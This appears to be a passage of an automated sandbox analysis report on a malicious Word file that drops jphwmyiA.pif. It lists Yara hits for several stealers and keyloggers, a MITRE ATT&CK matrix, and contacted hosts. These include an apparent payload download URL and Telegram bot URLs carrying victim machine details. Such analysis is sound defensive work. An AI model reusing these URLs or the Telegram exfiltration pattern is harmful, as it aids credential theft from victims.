Source: Yara match	File source: Process Memory Space: jphwmyiA.pif PID: 2228, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jphwmyiA.pif PID: 5476, type: MEMORYSTR

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 12.2.jphwmyiA.pif.25f2a8c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1d140000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.jphwmyiA.pif.283edba0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.jphwmyiA.pif.24507b80.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1d140000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.25f299de.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1cb10000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2c9b0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2c9b0ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28730ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2a0399de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2c9b0ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2a03a8c6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.25f2a8c6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28730000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2d020000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1a1da8c6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1cb10000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1cb10ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2d020000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28fc0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.jphwmyiA.pif.24507b80.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2a0399de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.25f299de.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.jphwmyiA.pif.187dcca8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1cb10ee8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2c9b0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28730000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.jphwmyiA.pif.187dcca8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28730ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1a1d99de.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2a03a8c6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1a1da8c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1a1d99de.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28fc0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.jphwmyiA.pif.283edba0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.3446215142.0000000027271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3441954113.0000000029FF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2210977844.0000000024507000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3443379570.0000000025EE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2406157824.00000000283ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3443379993.000000001A199000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3446220044.000000002B461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2330033359.00000000187DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3446431807.000000001B4F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 00000010.00000002.3444167534.000000001A451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3444524206.000000002A3C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 12.2.jphwmyiA.pif.25f2a8c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1d140000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.jphwmyiA.pif.283edba0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.jphwmyiA.pif.24507b80.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1d140000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.25f299de.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1cb10000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2c9b0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2c9b0ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28730ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2a0399de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2c9b0ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2a03a8c6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.25f2a8c6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28730000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2d020000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1a1da8c6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1cb10000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1cb10ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2d020000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28fc0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.jphwmyiA.pif.24507b80.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2a0399de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.25f299de.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.jphwmyiA.pif.187dcca8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1cb10ee8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2c9b0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28730000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.jphwmyiA.pif.187dcca8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28730ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1a1d99de.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2a03a8c6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1a1da8c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1a1d99de.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28fc0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.jphwmyiA.pif.283edba0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3441954113.0000000029FF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2210977844.0000000024507000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3443379570.0000000025EE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2406157824.00000000283ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3443379993.000000001A199000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2330033359.00000000187DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: jphwmyiA.pif PID: 6396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jphwmyiA.pif PID: 2228, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jphwmyiA.pif PID: 5476, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 12.2.jphwmyiA.pif.25f2a8c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1d140000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.jphwmyiA.pif.283edba0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.jphwmyiA.pif.24507b80.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1d140000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.25f299de.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1cb10000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2c9b0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2c9b0ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28730ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2a0399de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2c9b0ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2a03a8c6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.25f2a8c6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28730000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2d020000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1a1da8c6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1cb10000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1cb10ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2d020000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28fc0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.jphwmyiA.pif.24507b80.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2a0399de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.25f299de.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.jphwmyiA.pif.187dcca8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1cb10ee8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2c9b0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28730000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.jphwmyiA.pif.187dcca8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28730ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1a1d99de.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2a03a8c6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1a1da8c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1a1d99de.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28fc0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.jphwmyiA.pif.283edba0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3441954113.0000000029FF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2210977844.0000000024507000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3443379570.0000000025EE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2406157824.00000000283ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3443379993.000000001A199000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2330033359.00000000187DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: jphwmyiA.pif PID: 6396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jphwmyiA.pif PID: 2228, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jphwmyiA.pif PID: 5476, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	22 Scripting	1 Valid Accounts	1 Native API	22 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Shared Modules	1 DLL Side-Loading	1 Extra Window Memory Injection	11 Deobfuscate/Decode Files or Information	LSASS Memory	1 System Network Connections Discovery	Remote Desktop Protocol	1 Data from Local System	13 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	33 Exploitation for Client Execution	1 Valid Accounts	1 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	3 Software Packing	NTDS	36 System Information Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	312 Process Injection	1 Timestomp	LSA Secrets	1 Query Registry	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	Cached Domain Credentials	141 Security Software Discovery	VNC	GUI Input Capture	234 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Extra Window Memory Injection	DCSync	41 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	221 Masquerading	Proc Filesystem	3 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Valid Accounts	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	41 Virtualization/Sandbox Evasion	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	312 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
ENQ-0092025.doc	58%	ReversingLabs	Win32.Exploit.DBatLoader
ENQ-0092025.doc	100%	Avira	W97M/Agent.5915124
ENQ-0092025.doc	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\Public\Libraries\jphwmyiA.pif	3%	ReversingLabs

Source	Detection	Scanner	Label
http://amazonenviro.com:80/245_Aiymwhpjxsg	0%	Avira URL Cloud	safe
http://amazonenviro.com/	0%	Avira URL Cloud	safe
http://amazonenviro.com/245_Aiymwhpjxsg	0%	Avira URL Cloud	safe
http://crt.sectig	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	188.114.97.3	true	false	high
mail.techniqueqatar.com	208.91.198.176	true	true	unknown
amazonenviro.com	166.62.27.188	true	true	unknown
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	132.226.8.169	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false		high
http://amazonenviro.com/245_Aiymwhpjxsg	true	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2007/01/2025%20/%2023:15:16%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2007/01/2025%20/%2022:17:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2007/01/2025%20/%2021:58:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		high
http://checkip.dyndns.org/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0	brightness.exe, 00000008.00000002.2228361462.0000000020510000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2200013988.0000000000874000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2230547224.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2232389580.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2199559053.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000003.2318831229.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2359054584.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002534000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.office.com/	jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	jphwmyiA.pif, 0000000C.00000002.3451586724.0000000028909000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3451586724.000000002893C000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3452191252.000000001D6AF000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000003.2732557349.000000002D31A000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000003.2732597157.000000002D340000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3452062242.000000002D2A0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	jphwmyiA.pif, 0000000C.00000002.3446215142.00000000274A2000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3446431807.000000001B722000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3446220044.000000002B693000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	jphwmyiA.pif, 0000000C.00000002.3446215142.00000000274A2000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3446431807.000000001B722000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3446220044.000000002B693000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0	brightness.exe, 00000008.00000002.2228361462.0000000020510000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2200013988.0000000000874000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2230547224.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2232389580.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2199559053.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3451586724.0000000028909000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3451586724.000000002893C000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000003.2318831229.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2359054584.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002534000.00000004.00001000.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3452191252.000000001D6AF000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000003.2732557349.000000002D31A000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000003.2732597157.000000002D340000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3452062242.000000002D2A0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org	jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A536000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4A9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	jphwmyiA.pif, 0000000C.00000002.3446215142.00000000274A2000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3446431807.000000001B722000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3446220044.000000002B693000.00000004.00000800.00020000.00000000.sdmp	false		high
